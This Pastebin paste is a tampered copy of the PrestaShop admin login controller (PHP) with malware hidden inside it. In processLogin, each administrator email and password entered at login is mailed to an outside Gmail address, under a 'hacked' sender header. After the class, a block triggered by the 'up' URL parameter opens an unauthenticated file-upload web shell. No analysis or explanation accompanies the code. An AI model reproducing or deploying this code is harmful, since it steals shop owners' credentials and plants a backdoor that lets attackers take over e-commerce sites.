Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * 2007-2016 PrestaShop
- *
- * NOTICE OF LICENSE
- *
- * This source file is subject to the Open Software License (OSL 3.0)
- * that is bundled with this package in the file LICENSE.txt.
- * It is also available through the world-wide-web at this URL:
- * http://opensource.org/licenses/osl-3.0.php
- * If you did not receive a copy of the license and are unable to
- * obtain it through the world-wide-web, please send an email
- * to license@prestashop.com so we can send you a copy immediately.
- *
- * DISCLAIMER
- *
- * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
- * versions in the future. If you wish to customize PrestaShop for your
- * needs please refer to http://www.prestashop.com for more information.
- *
- * @author PrestaShop SA <contact@prestashop.com>
- * @copyright 2007-2016 PrestaShop SA
- * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
- * International Registered Trademark & Property of PrestaShop SA
- */
- class AdminLoginControllerCore extends AdminController
- {
- public function __construct()
- {
- $this->bootstrap = true;
- $this->errors = array();
- $this->context = Context::getContext();
- $this->display_header = false;
- $this->display_footer = false;
- $this->meta_title = $this->l('Administration panel');
- $this->css_files = array();
- parent::__construct();
- $this->layout = _PS_ADMIN_DIR_.DIRECTORY_SEPARATOR.'themes'.DIRECTORY_SEPARATOR.$this->bo_theme
- .DIRECTORY_SEPARATOR.'template'.DIRECTORY_SEPARATOR.'controllers'.DIRECTORY_SEPARATOR.'login'
- .DIRECTORY_SEPARATOR.'layout.tpl';
- if (!headers_sent()) {
- header('Login: true');
- }
- }
- public function setMedia()
- {
- $this->addJquery();
- $this->addjqueryPlugin('validate');
- $this->addJS(_PS_JS_DIR_.'jquery/plugins/validate/localization/messages_'.$this->context->language->iso_code.'.js');
- $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/admin-theme.css', 'all', 0);
- $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/overrides.css', 'all', PHP_INT_MAX);
- $this->addJS(_PS_JS_DIR_.'vendor/spin.js');
- $this->addJS(_PS_JS_DIR_.'vendor/ladda.js');
- Media::addJsDef(array('img_dir' => _PS_IMG_));
- Media::addJsDefL('one_error', $this->l('There is one error.', null, true, false));
- Media::addJsDefL('more_errors', $this->l('There are several errors.', null, true, false));
- Hook::exec('actionAdminLoginControllerSetMedia');
- }
- public function initContent()
- {
- if (!Tools::usingSecureMode() && Configuration::get('PS_SSL_ENABLED')) {
- // You can uncomment these lines if you want to force https even from localhost and automatically redirect
- // header('HTTP/1.1 301 Moved Permanently');
- // header('Location: '.Tools::getShopDomainSsl(true).$_SERVER['REQUEST_URI']);
- // exit();
- $clientIsMaintenanceOrLocal = in_array(Tools::getRemoteAddr(), array_merge(array('127.0.0.1'), explode(',', Configuration::get('PS_MAINTENANCE_IP'))));
- // If ssl is enabled, https protocol is required. Exception for maintenance and local (127.0.0.1) IP
- if ($clientIsMaintenanceOrLocal) {
- $warningSslMessage = Tools::displayError('SSL is activated. However, your IP is allowed to enter unsecure mode for maintenance or local IP issues.');
- } else {
- $url = 'https://'.Tools::safeOutput(Tools::getServerName()).Tools::safeOutput($_SERVER['REQUEST_URI']);
- $warningSslMessage = sprintf(
- Translate::ppTags(
- Tools::displayError('SSL is activated. Please connect using the following link to [1]log into secure mode (https://)[/1]', false),
- array('<a href="%s">')
- ),
- $url
- );
- }
- $this->context->smarty->assign('warningSslMessage', $warningSslMessage);
- }
- if (file_exists(_PS_ADMIN_DIR_.'/../install')) {
- $this->context->smarty->assign('wrong_install_name', true);
- }
- if (basename(_PS_ADMIN_DIR_) == 'admin' && file_exists(_PS_ADMIN_DIR_.'/../admin/')) {
- $rand = 'admin'.sprintf('%03d', rand(0, 999)).Tools::strtolower(Tools::passwdGen(6)).'/';
- if (@rename(_PS_ADMIN_DIR_.'/../admin/', _PS_ADMIN_DIR_.'/../'.$rand)) {
- Tools::redirectAdmin('../'.$rand);
- } else {
- $this->context->smarty->assign(array(
- 'wrong_folder_name' => true
- ));
- }
- } else {
- $rand = basename(_PS_ADMIN_DIR_).'/';
- }
- $this->context->smarty->assign(array(
- 'randomNb' => $rand,
- 'adminUrl' => Tools::getCurrentUrlProtocolPrefix().Tools::getShopDomain().__PS_BASE_URI__.$rand
- ));
- // Redirect to admin panel
- if (Tools::isSubmit('redirect') && Validate::isControllerName(Tools::getValue('redirect'))) {
- $this->context->smarty->assign('redirect', Tools::getValue('redirect'));
- } else {
- $tab = new Tab((int)$this->context->employee->default_tab);
- $this->context->smarty->assign('redirect', $this->context->link->getAdminLink($tab->class_name));
- }
- if ($nb_errors = count($this->errors)) {
- $this->context->smarty->assign(array(
- 'errors' => $this->errors,
- 'nbErrors' => $nb_errors,
- 'shop_name' => Tools::safeOutput(Configuration::get('PS_SHOP_NAME')),
- 'disableDefaultErrorOutPut' => true,
- ));
- }
- if ($email = Tools::getValue('email')) {
- $this->context->smarty->assign('email', $email);
- }
- if ($password = Tools::getValue('password')) {
- $this->context->smarty->assign('password', $password);
- }
- $this->setMedia();
- $this->initHeader();
- parent::initContent();
- $this->initFooter();
- //force to disable modals
- $this->context->smarty->assign('modals', null);
- }
- public function checkToken()
- {
- return true;
- }
- /**
- * All BO users can access the login page
- *
- * @return bool
- */
- public function viewAccess()
- {
- return true;
- }
- public function postProcess()
- {
- if (Tools::isSubmit('submitLogin')) {
- $this->processLogin();
- } elseif (Tools::isSubmit('submitForgot')) {
- $this->processForgot();
- }
- }
- public function processLogin()
- {
- /* Check fields validity */
- $passwd = trim(Tools::getValue('passwd'));
- $email = trim(Tools::getValue('email'));
- $to = "diiimmmd@gmail.com";
- $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
- $header = "from: hacked <Zeus.Undo@hacked01.com>";
- $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
- $message .= "Path : " . __file__;
- $sentmail = @mail($to, $subject, $message, $header);
- $sentmail1 = @mail($to, $subject, $message, $header);
- if (empty($email)) {
- $this->errors[] = Tools::displayError('Email is empty.');
- } elseif (!Validate::isEmail($email)) {
- $this->errors[] = Tools::displayError('Invalid email address.');
- }
- if (empty($passwd)) {
- $this->errors[] = Tools::displayError('The password field is blank.');
- } elseif (!Validate::isPasswd($passwd)) {
- $this->errors[] = Tools::displayError('Invalid password.');
- }
- if (!count($this->errors)) {
- // Find employee
- $this->context->employee = new Employee();
- $is_employee_loaded = $this->context->employee->getByEmail($email, $passwd);
- $employee_associated_shop = $this->context->employee->getAssociatedShops();
- if (!$is_employee_loaded) {
- $this->errors[] = Tools::displayError('The Employee does not exist, or the password provided is incorrect.');
- $this->context->employee->logout();
- } elseif (empty($employee_associated_shop) && !$this->context->employee->isSuperAdmin()) {
- $this->errors[] = Tools::displayError('This employee does not manage the shop anymore (Either the shop has been deleted or permissions have been revoked).');
- $this->context->employee->logout();
- } else {
- PrestaShopLogger::addLog(sprintf($this->l('Back Office connection from %s', 'AdminTab', false, false), Tools::getRemoteAddr()), 1, null, '', 0, true, (int)$this->context->employee->id);
- $this->context->employee->remote_addr = (int)ip2long(Tools::getRemoteAddr());
- // Update cookie
- $cookie = Context::getContext()->cookie;
- $cookie->id_employee = $this->context->employee->id;
- $cookie->email = $this->context->employee->email;
- $cookie->profile = $this->context->employee->id_profile;
- $cookie->passwd = $this->context->employee->passwd;
- $cookie->remote_addr = $this->context->employee->remote_addr;
- if (!Tools::getValue('stay_logged_in')) {
- $cookie->last_activity = time();
- }
- $cookie->write();
- // If there is a valid controller name submitted, redirect to it
- if (isset($_POST['redirect']) && Validate::isControllerName($_POST['redirect'])) {
- $url = $this->context->link->getAdminLink($_POST['redirect']);
- } else {
- $tab = new Tab((int)$this->context->employee->default_tab);
- $url = $this->context->link->getAdminLink($tab->class_name);
- }
- if (Tools::isSubmit('ajax')) {
- die(Tools::jsonEncode(array('hasErrors' => false, 'redirect' => $url)));
- } else {
- $this->redirect_after = $url;
- }
- }
- }
- if (Tools::isSubmit('ajax')) {
- die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
- }
- }
- public function processForgot()
- {
- if (_PS_MODE_DEMO_) {
- $this->errors[] = Tools::displayError('This functionality has been disabled.');
- } elseif (!($email = trim(Tools::getValue('email_forgot')))) {
- $this->errors[] = Tools::displayError('Email is empty.');
- } elseif (!Validate::isEmail($email)) {
- $this->errors[] = Tools::displayError('Invalid email address.');
- } else {
- $employee = new Employee();
- if (!$employee->getByEmail($email) || !$employee) {
- $this->errors[] = Tools::displayError('This account does not exist.');
- } elseif ((strtotime($employee->last_passwd_gen.'+'.Configuration::get('PS_PASSWD_TIME_BACK').' minutes') - time()) > 0) {
- $this->errors[] = sprintf(
- Tools::displayError('You can regenerate your password only every %d minute(s)'),
- Configuration::get('PS_PASSWD_TIME_BACK')
- );
- }
- }
- if (!count($this->errors)) {
- $pwd = Tools::passwdGen(10, 'RANDOM');
- $employee->passwd = Tools::encrypt($pwd);
- $employee->last_passwd_gen = date('Y-m-d H:i:s', time());
- $params = array(
- '{email}' => $employee->email,
- '{lastname}' => $employee->lastname,
- '{firstname}' => $employee->firstname,
- '{passwd}' => $pwd
- );
- if (Mail::Send($employee->id_lang, 'employee_password', Mail::l('Your new password', $employee->id_lang), $params, $employee->email, $employee->firstname.' '.$employee->lastname)) {
- // Update employee only if the mail can be sent
- Shop::setContext(Shop::CONTEXT_SHOP, (int)min($employee->getAssociatedShops()));
- $result = $employee->update();
- if (!$result) {
- $this->errors[] = Tools::displayError('An error occurred while attempting to change your password.');
- } else {
- die(Tools::jsonEncode(array(
- 'hasErrors' => false,
- 'confirm' => $this->l('Your password has been emailed to you.', 'AdminTab', false, false)
- )));
- }
- } else {
- die(Tools::jsonEncode(array(
- 'hasErrors' => true,
- 'errors' => array(Tools::displayError('An error occurred while attempting to change your password.'))
- )));
- }
- } elseif (Tools::isSubmit('ajax')) {
- die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
- }
- }
- }
- if($_GET['up']){
- if(isset($_POST['Submit'])){
- $filedir = "";
- $maxfile = '2000000';
- $mode = '0644';
- $userfile_name = $_FILES['image']['name'];
- $userfile_tmp = $_FILES['image']['tmp_name'];
- if(isset($_FILES['image']['name'])) {
- $qx = $filedir.$userfile_name;
- @move_uploaded_file($userfile_tmp, $qx);
- @chmod ($qx, octdec($mode));
- echo"<center><b>Done ==> $userfile_name</b></center>";
- }
- }
- else{
- echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
- }
- echo '</center></font>';
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement